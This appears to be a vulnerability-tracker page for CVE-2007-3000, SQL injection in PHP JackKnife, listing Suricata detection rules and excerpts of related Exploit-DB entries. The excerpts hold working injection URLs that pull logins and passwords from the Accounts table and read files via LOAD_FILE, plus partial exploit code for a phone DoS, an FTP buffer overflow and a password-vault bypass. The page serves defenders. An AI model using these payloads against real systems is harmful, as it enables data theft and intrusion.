CVE-2007-3000
published 2007-06-04CVE-2007-3000: Multiple SQL injection vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to execute arbitrary SQL commands via (1) the iCategoryUnq parameter to…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.24%
65.6th percentile
Multiple SQL injection vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to execute arbitrary SQL commands via (1) the iCategoryUnq parameter to G_Display.php or (2) the iSearchID parameter to Search/DisplayResults.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_jackknife | php_jackknife | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq SELECT
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq SELECT"; flow:established,to_server; http.uri; content:"/G_Display.php?"; nocase; content:"iCategoryUnq="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004480; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_na
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE"; flow:established,to_server; http.uri; content:"/G_Display.php?"; nocase; content:"iCategoryUnq="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004485; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_nam
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID INSERT
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID INSERT"; flow:established,to_server; http.uri; content:"/Search/DisplayResults.php?"; nocase; content:"iSearchID="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004488; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mi
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID SELECT
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID SELECT"; flow:established,to_server; http.uri; content:"/Search/DisplayResults.php?"; nocase; content:"iSearchID="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004486; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mi
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq INSERT
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq INSERT"; flow:established,to_server; http.uri; content:"/G_Display.php?"; nocase; content:"iCategoryUnq="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004482; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_na
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UNION SELECT
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UNION SELECT"; flow:established,to_server; http.uri; content:"/Search/DisplayResults.php?"; nocase; content:"iSearchID="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004487; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID DELETE
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID DELETE"; flow:established,to_server; http.uri; content:"/Search/DisplayResults.php?"; nocase; content:"iSearchID="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004489; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mi
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq ASCII
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq ASCII"; flow:established,to_server; http.uri; content:"/G_Display.php?"; nocase; content:"iCategoryUnq="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004484; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_na
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UNION SELECT
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UNION SELECT"; flow:established,to_server; http.uri; content:"/G_Display.php?"; nocase; content:"iCategoryUnq="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004481; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_04, mitre_tactic_id TA0001, mitre_tactic_n
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE"; flow:established,to_server; http.uri; content:"/Search/DisplayResults.php?"; nocase; content:"iSearchID="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004491; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mit
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID ASCII
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID ASCII"; flow:established,to_server; http.uri; content:"/Search/DisplayResults.php?"; nocase; content:"iSearchID="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004490; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mi
Suricata
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3000 [HIGH] ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq DELETE
ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq DELETE"; flow:established,to_server; http.uri; content:"/G_Display.php?"; nocase; content:"iCategoryUnq="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3000; reference:url,www.securityfocus.com/bid/24253; classtype:web-application-attack; sid:2004483; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_na
Exploit-DB
Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)
exploitdb·2010-06-07
CVE-2010-2343 Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)
Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)
---
# Exploit Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow
# Date : June 7, 2010
# Author : chap0 [http://www.seek-truth.net]
# Software Link : http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
# Tested on : Windows XP SP3 En
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048
# --------------------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# fo
Exploit-DB
TEKUVA - Password Reminder Authentication Bypass
exploitdb·2009-11-21
CVE-2009-4781 TEKUVA - Password Reminder Authentication Bypass
TEKUVA - Password Reminder Authentication Bypass
---
#!/usr/bin/perl
# Exploit: TEKUVA Password Reminder Authentication Bypass
# Date: [11/19/2009]
# Author: iqlusion [[email protected]]
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html
# Version: 1.0.0.1
# Info: TEKUVA Password Reminder is a password vault that allows you to store all
# your credentials in one spot and all you have to remember is a single 'main'
# password to access your vault. Unfortunately, the vault is actually an
# Access 2007 database that is protected by a password which is hard coded into
# the program, not your main password.
#
# This script connects to the database using the hard coded db password and dumps
# everything into an HTML table, bypassing the need to enter th
Exploit-DB
Grandstream GXV-3000 Phone - Remote Denial of Service
exploitdb·2007-08-22
CVE-2007-4498 Grandstream GXV-3000 Phone - Remote Denial of Service
Grandstream GXV-3000 Phone - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/25399/info
Grandstream GXV-3000 phones are prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause the device to accept a phone while being unable to hang up. This effectively denies service to legitimate users because further calls will not be accepted by the device.
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[5]);
$socket=new IO::Socket::INET->new(
Proto=>'udp',
LocalPort => $ARGV[4],
PeerPort=>$ARGV[1],
PeerAddr=>$ARGV[0]);
$sdp= "v=0\r
o=username 0 0 IN IP4 $ARGV[3]\r
s=The Funky Flow\r
c=IN IP4 $ARGV[3]\r
t=0 0\r
m=audio 33404 RTP/AVP 3 97 0 8\r
a=rtpmap:0 PCMU/8000\r
a=rtpmap:3 GSM/8000\r
a
Exploit-DB
PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection
exploitdb·2007-05-31
CVE-2007-3000 PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection
PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection
---
source: https://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
Read database credentials:
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F
Exploit-DB
PHP JackKnife 2.21 - '/(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection
exploitdb·2007-05-31
CVE-2007-3000 PHP JackKnife 2.21 - '/(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection
PHP JackKnife 2.21 - '/(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection
---
source: https://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*
Exploit-DB
eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities
exploitdb·2007-04-12
CVE-2007-2059 eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities
eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities
---
source: https://www.securityfocus.com/bid/23454/info
eIQnetworks Enterprise Security Analyzer is prone to multiple buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
Exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Enterprise Security Analyzer 2.5 is reported vulnerable; other versions may also be affected.
- DELETESEARCHFOLDER : [DELETESEARCHFOLDER&A x 40000...&]
- DELTASK: [DELTASK&A x 3000...¤t&test&]
- HMGR_CHECKHOSTSCSV: [ HMGR_CHE
Exploit-DB
BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2007-01-14
CVE-2007-0338 BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
---
/**************************************************************************
*BolinTech DreamFTP USER buffer overflow *
* *
*The server does not correctly handle format string so sending a command *
*like USER %1*3000 let us own EDX. Other values can also affect EAX & ECX *
* *
*This is only a POC but code execution is possible *
* *
*usage: dreamftp.exe ip port *
* *
*Coded by Marsu *
**************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[5003];
int buflen=5000
No writeups or analysis indexed.
http://osvdb.org/36318http://osvdb.org/36319http://secunia.com/advisories/25487http://securityreason.com/securityalert/2768http://www.securityfocus.com/archive/1/470111/100/0/threadedhttp://www.securityfocus.com/bid/24253https://exchange.xforce.ibmcloud.com/vulnerabilities/34641http://osvdb.org/36318http://osvdb.org/36319http://secunia.com/advisories/25487http://securityreason.com/securityalert/2768http://www.securityfocus.com/archive/1/470111/100/0/threadedhttp://www.securityfocus.com/bid/24253https://exchange.xforce.ibmcloud.com/vulnerabilities/34641
2007-06-04
Published